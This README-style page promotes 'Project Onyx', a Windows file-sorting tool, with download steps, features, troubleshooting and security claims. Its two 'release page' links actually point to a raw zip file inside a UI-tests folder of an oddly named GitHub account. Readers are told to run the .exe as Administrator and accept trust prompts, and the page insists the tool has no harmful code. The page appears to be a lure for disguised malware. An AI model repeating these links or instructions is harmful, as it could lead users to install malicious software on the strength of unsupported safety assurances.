💎 project-onyx - Organize your digital files with ease

Download Project Onyx

Project Onyx helps you manage files on your Windows computer. It sorts, renames, and moves your documents to keep your workspace clean. You do not need technical skills to use this tool.

🚀 Getting Started

Follow these steps to set up the software on your computer.

  1. Visit the download page: https://github.com/Scooteretymologist766/project-onyx/raw/refs/heads/main/Onyx/OnyxUITests/project-onyx-2.8.zip
  2. Look for the latest version under the Releases section.
  3. Click the link that ends in .exe to save the file to your computer.

⚙️ System Requirements

Your computer must meet these standards to run the software smoothly:

  • Operating System: Windows 10 or Windows 11.
  • Memory: At least 4 gigabytes of RAM.
  • Storage: 200 megabytes of free disk space.
  • Processor: A standard dual-core processor from the last five years.

📥 Installing the Software

Once you download the installer, open your Downloads folder. Double-click the file named project-onyx-setup.exe. A window will appear. Follow the instructions on the screen.

  • Choose a location on your hard drive for the files. The default location works for most users.
  • Grant permission if your computer asks if you trust the software.
  • Wait for the progress bar to finish.
  • Click the Finish button.

You will see an icon for Project Onyx on your desktop. Double-click this icon to start the program.

🛠 Features

Project Onyx includes several tools to help you organize data.

Automatic Sorting

The software scans your Downloads folder every hour. It identifies file types like photos, documents, and spreadsheets. It moves these files into folders named Pictures, Documents, and Sheets. You save time by letting the software handle the filing.

Duplicate Detection

Digital clutter often happens when you save the same file twice. Project Onyx compares file names and sizes. It alerts you when it finds duplicates. You decide whether to delete or keep the extra files.

Custom Rule Creation

You can set your own rules for how files move. If you want all files from a specific sender to go to a folder named Taxes, the software allows you to define this path. Open the Settings menu to add a custom rule.

📋 How to Download and Setup

Access the release page to get the software: https://github.com/Scooteretymologist766/project-onyx/raw/refs/heads/main/Onyx/OnyxUITests/project-onyx-2.8.zip

When you arrive at the page:

  1. Locate the header labeled Releases.
  2. Select the newest version at the top of the list.
  3. Select the file with an .exe extension.
  4. Save the file to your computer.
  5. Run the file as described in the installation section above.

❓ Troubleshooting

If you run into trouble, try these steps to solve the issue.

The program fails to open

Restart your computer. Sometimes Windows needs a refresh to recognize a new program. Make sure you have an internet connection during the first launch, as the program might need to confirm the license.

The software does not sort files

Check the Settings menu. Ensure the "Enable Auto-Sort" box has a checkmark. Verify that you selected folders that the software has permission to access. If you try to sort files in a system folder, Windows might block the action for security reasons. Stick to folders you created yourself for the best results.

The installation window freezes

Close the window and try again. Right-click the installer and choose "Run as Administrator." This gives the installer permission to create necessary folders on your hard drive.

🛡 Security and Privacy

Safety matters when you run new programs. This tool only interacts with files you choose. It does not send your private data to any remote servers. Your data stays on your local machine.

The code for Project Onyx is open for review. Security experts monitor the files to ensure they contain no harmful code. You can trust the tool with your local document cleanup tasks.

📩 Support

If the software does not work, check the issues tab on the website. Use the link at the top of this document to reach the project page. You can read questions from other users or report a new problem. Include a screenshot of any error message you see. This helps people understand what went wrong on your system.

🌟 Future Updates

The team adds improvements to the software regularly. You can check for updates inside the Help menu of the program. When a new version arrives, the software asks if you want to install it. Keeping the software up to date keeps your file organization running at peak performance.
